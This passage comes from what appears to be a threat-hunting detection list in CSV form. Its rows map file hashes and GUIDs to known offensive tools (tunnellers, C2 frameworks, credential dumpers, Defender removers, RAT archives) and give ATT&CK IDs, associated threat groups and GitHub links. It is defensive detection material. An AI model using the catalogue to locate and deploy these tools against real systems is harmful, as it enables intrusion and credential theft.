TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","44090" "*f63567b66d159c784dd72daab73acf100c3025481b22260980a87d5efdc5a6eb*",".{0,1000}f63567b66d159c784dd72daab73acf100c3025481b22260980a87d5efdc5a6eb.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44092" "*f639c47dde4c4e363129e6b9ca2610cc07c93265b5e47c773dcf54f5f4b08d7c*",".{0,1000}f639c47dde4c4e363129e6b9ca2610cc07c93265b5e47c773dcf54f5f4b08d7c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","44094" "*f63b78ec533b0b101033c9b5268933e0d788720388b136ce10ce83c9ee02fcf4*",".{0,1000}f63b78ec533b0b101033c9b5268933e0d788720388b136ce10ce83c9ee02fcf4.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44096" 
"*f63c29ce8df84e2f6aecfcdd4338ade69d0bca92dd92e45b7373030cfe7539c0*",".{0,1000}f63c29ce8df84e2f6aecfcdd4338ade69d0bca92dd92e45b7373030cfe7539c0.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","44097" "*f65740929e9608e0590eee78f1ba20793d99163ac5f6dc1c8b8734b742c4da11*",".{0,1000}f65740929e9608e0590eee78f1ba20793d99163ac5f6dc1c8b8734b742c4da11.{0,1000}","offensive_tool_keyword","cobaltstrike","alternative to the Cobalt Strike Beacon","T1071.001 - T1041 - T1219 - T1105","TA0011","N/A","N/A","C2","https://github.com/ElJaviLuki/CobaltStrike_OpenBeacon","1","0","#filehash","N/A","10","10","225","40","2024-03-13T04:32:57Z","2023-12-27T18:37:46Z","44103" "*f66678009d2d605438bb2b8308cbce9b05aeb25a63785c228e30b52c8e43af75*",".{0,1000}f66678009d2d605438bb2b8308cbce9b05aeb25a63785c228e30b52c8e43af75.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44104" "*f666dbab003b377019955f3f304ac68c9af5defd5e05a39e916e7af8ad9076c1*",".{0,1000}f666dbab003b377019955f3f304ac68c9af5defd5e05a39e916e7af8ad9076c1.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","44105" "*f66f7bfa92e6106e77dba36fd345df2bb84a4cf9b798076e979b1b61bab53f1c*",".{0,1000}f66f7bfa92e6106e77dba36fd345df2bb84a4cf9b798076e979b1b61bab53f1c.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","44109" "*f67880e200d99b83404108e9a563c7f97eda8ac8c3fff08dc065d8734cfa57a1*",".{0,1000}f67880e200d99b83404108e9a563c7f97eda8ac8c3fff08dc065d8734cfa57a1.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","44110" "*f67a3d9c0c161cb273819ff6fe64f8aa45195590d8f46e7dd91433a461c4dba3*",".{0,1000}f67a3d9c0c161cb273819ff6fe64f8aa45195590d8f46e7dd91433a461c4dba3.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","44111" "*f67a93fa0870a0ef178d165eb20fb77d60c1a87e5b82851c63aad115ffe90bd4*",".{0,1000}f67a93fa0870a0ef178d165eb20fb77d60c1a87e5b82851c63aad115ffe90bd4.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator 
Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","44112" "*f67dd8a803b6a71f7e13d8d0c8d6bb07de34a401f5fc966c157fc46e1c2a557c*",".{0,1000}f67dd8a803b6a71f7e13d8d0c8d6bb07de34a401f5fc966c157fc46e1c2a557c.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","44113" "*f680df97c02b27fad2add251018194bffa1c47c765cb6c87a79ad07294bb0551*",".{0,1000}f680df97c02b27fad2add251018194bffa1c47c765cb6c87a79ad07294bb0551.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","44114" "*f6888c1406e2b3549c9bc11929595170d3a74b0d4968f603cc33f9a896a53a95*",".{0,1000}f6888c1406e2b3549c9bc11929595170d3a74b0d4968f603cc33f9a896a53a95.{0,1000}","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","0","#filehash","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","44116" "*f688df8c4a60bbb34467b8ef179a51f06af68b9861fa848d591df9c316a0c974*",".{0,1000}f688df8c4a60bbb34467b8ef179a51f06af68b9861fa848d591df9c316a0c974.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - 
T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44117" "*f6898381e46e3d7b755f69c7e5dff72800a29a37ea707ec06c3c793437910dd4*",".{0,1000}f6898381e46e3d7b755f69c7e5dff72800a29a37ea707ec06c3c793437910dd4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44118" "*f691703db162bafdc2682f60af4484a7413f6c0d39916fd7ae0469a132aec34d*",".{0,1000}f691703db162bafdc2682f60af4484a7413f6c0d39916fd7ae0469a132aec34d.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44119" "*f6955930082d6cb41401cd02d95e0f79bf44f92918adc18bdbd5aef7207625d1*",".{0,1000}f6955930082d6cb41401cd02d95e0f79bf44f92918adc18bdbd5aef7207625d1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44120" "*f6a47b25b4d9fa389de6360c9527c638a65bd2ee3c45d0f8b2b67afabf039f72*",".{0,1000}f6a47b25b4d9fa389de6360c9527c638a65bd2ee3c45d0f8b2b67afabf039f72.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44121" "*f6b986ccaaf37e82ac9dbea5107d35af95b18aff0f33450c9876b051e2e6ba9c*",".{0,1000}f6b986ccaaf37e82ac9dbea5107d35af95b18aff0f33450c9876b051e2e6ba9c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44125" "*f6bb09ea48d85445fb1295a7b93ead6700a17c8f839624871f4faf024e18e39f*",".{0,1000}f6bb09ea48d85445fb1295a7b93ead6700a17c8f839624871f4faf024e18e39f.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth 
Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","44126" "*f6c0d79de6c79b74f249d3f3ee8d5066459e94e254723022b63c2a53a82b2e81*",".{0,1000}f6c0d79de6c79b74f249d3f3ee8d5066459e94e254723022b63c2a53a82b2e81.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44127" "*f6da5084b596592c4f64b70548b40a8850cb26218fabe7e1baeca5357653cad9*",".{0,1000}f6da5084b596592c4f64b70548b40a8850cb26218fabe7e1baeca5357653cad9.{0,1000}","offensive_tool_keyword","POC","Windows Privilege escalation POC exploitation for CVE-2024-49138","T1068 - T1058 - T1203","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/CVE-2024-49138-POC","1","0","#filehash","N/A","9","1","1","0","2025-01-15T01:01:21Z","2025-01-15T02:11:49Z","44132" "*f6e0cfff7d80e0673848a96bc1e667c2716dec682c4f61156f83b070b9da8b4e*",".{0,1000}f6e0cfff7d80e0673848a96bc1e667c2716dec682c4f61156f83b070b9da8b4e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44134" "*f6e16eee3494ad168fa124552fba957ba8ddf8e7d96eedeef33f9e2afe1e9257*",".{0,1000}f6e16eee3494ad168fa124552fba957ba8ddf8e7d96eedeef33f9e2afe1e9257.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","#filehash","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","44135" "*f6e25a72071f1dcfc6f383a694cd1a8c1889560593abf02b45451c6c7a851aca*",".{0,1000}f6e25a72071f1dcfc6f383a694cd1a8c1889560593abf02b45451c6c7a851aca.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44136" "*f6e3f58333eee37bb52f603b1c8f9aa73d16ec2051f6349284d0f09c8847bb60*",".{0,1000}f6e3f58333eee37bb52f603b1c8f9aa73d16ec2051f6349284d0f09c8847bb60.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44138" "*f6ee090c3a4390f45e236b0a169b9b15a6a9094881a9f1336937a9d13d9fc5d6*",".{0,1000}f6ee090c3a4390f45e236b0a169b9b15a6a9094881a9f1336937a9d13d9fc5d6.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","44139" "*f6efa1ba7a66dddb2a14a652d4f96f365c73e3b15f5f40822eefbff9fc46a57c*",".{0,1000}f6efa1ba7a66dddb2a14a652d4f96f365c73e3b15f5f40822eefbff9fc46a57c.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential 
Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","44141" "*f6f082606e6725734c4ad3fef4e9d1ae5669ebab5c9085e6ab3b409793ca2000*",".{0,1000}f6f082606e6725734c4ad3fef4e9d1ae5669ebab5c9085e6ab3b409793ca2000.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","#filehash","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","44142" "*f6f65c22bb7a4f263d745b83a959cc8b295eadbc9f458afb437b716ad3fac833*",".{0,1000}f6f65c22bb7a4f263d745b83a959cc8b295eadbc9f458afb437b716ad3fac833.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44143" "*f6f865390750822cea504855053b4fe017001235f63f628f8433dab6f3b15582*",".{0,1000}f6f865390750822cea504855053b4fe017001235f63f628f8433dab6f3b15582.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44144" "*f6f8e3cb6081848ade48d449319f92832c45ecf01a7df1d3400bdf0a275e7e32*",".{0,1000}f6f8e3cb6081848ade48d449319f92832c45ecf01a7df1d3400bdf0a275e7e32.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44145" "*f70320403ba17e7643e7bd26f62bf42b6c01e184d40a2af0f5b46608d31f79e6*",".{0,1000}f70320403ba17e7643e7bd26f62bf42b6c01e184d40a2af0f5b46608d31f79e6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44146" "*F70D2B71-4AAE-4B24-9DAE-55BC819C78BB*",".{0,1000}F70D2B71\-4AAE\-4B24\-9DAE\-55BC819C78BB.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - 
TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","44147" "*f71501c6dbf8e31c30fabed0786fa3145af0e8862712f5803c0c4177fb8d1836*",".{0,1000}f71501c6dbf8e31c30fabed0786fa3145af0e8862712f5803c0c4177fb8d1836.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","#filehash","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","44148" "*f724f2ad9e30f001e16034efa68757a3baf31fe918a71722b529a53f71c3bac0*",".{0,1000}f724f2ad9e30f001e16034efa68757a3baf31fe918a71722b529a53f71c3bac0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44150" "*f7267a8880e45961219a6204a3a8ae5fff31e495f3f930e487f80cf89850f16f*",".{0,1000}f7267a8880e45961219a6204a3a8ae5fff31e495f3f930e487f80cf89850f16f.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data 
Exfiltration","https://github.com/erebe/wstunnel","1","0","#filehash","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","44152" "*f729be9878e7eb22412c98c5d28811a96e773b40333789717af19c6b218d9d22*",".{0,1000}f729be9878e7eb22412c98c5d28811a96e773b40333789717af19c6b218d9d22.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44153" "*f72e7336b7159fd38671d4150fb30894422fca78b0a8f214a15bb53a36b82cf4*",".{0,1000}f72e7336b7159fd38671d4150fb30894422fca78b0a8f214a15bb53a36b82cf4.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44154" "*f72fc36ad8ba09bf2a911d35badb9d702835768087889bef378285e1d088cdc7*",".{0,1000}f72fc36ad8ba09bf2a911d35badb9d702835768087889bef378285e1d088cdc7.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44155" "*f7306e6b984b5e7316ef8adab27eacd18bb6edfb249d704c26abf085ded69bd4*",".{0,1000}f7306e6b984b5e7316ef8adab27eacd18bb6edfb249d704c26abf085ded69bd4.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","44156" "*f7353868e1e35feb2bbd3a1b478698217a4cd06679fdb5dc8cc90f5232caa94b*",".{0,1000}f7353868e1e35feb2bbd3a1b478698217a4cd06679fdb5dc8cc90f5232caa94b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","44157" "*f745fdbab44bfd54a5997a5d8746a602eb3af30c10d3fd264edbc705a8bb6e2a*",".{0,1000}f745fdbab44bfd54a5997a5d8746a602eb3af30c10d3fd264edbc705a8bb6e2a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44159" "*F74BACC239A453DA97AACA6C0E9E70D2282CE801EC9A1262A8F3237CCFC27E9A*",".{0,1000}F74BACC239A453DA97AACA6C0E9E70D2282CE801EC9A1262A8F3237CCFC27E9A.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","44160" "*f74f648e1f204b440412e63a970d6ab69fc5e09923a7eda0488fc45d7edc147e*",".{0,1000}f74f648e1f204b440412e63a970d6ab69fc5e09923a7eda0488fc45d7edc147e.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense 
Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","44161" "*f74fb8cb7977e6256a91d07cb09beca1b498a355162d0793e06924bf7cab2e95*",".{0,1000}f74fb8cb7977e6256a91d07cb09beca1b498a355162d0793e06924bf7cab2e95.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44162" "*f752cf3610b17c90e8a4b03ffd0dc9de1f2005108556708108f940e78d57bde6*",".{0,1000}f752cf3610b17c90e8a4b03ffd0dc9de1f2005108556708108f940e78d57bde6.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","44163" 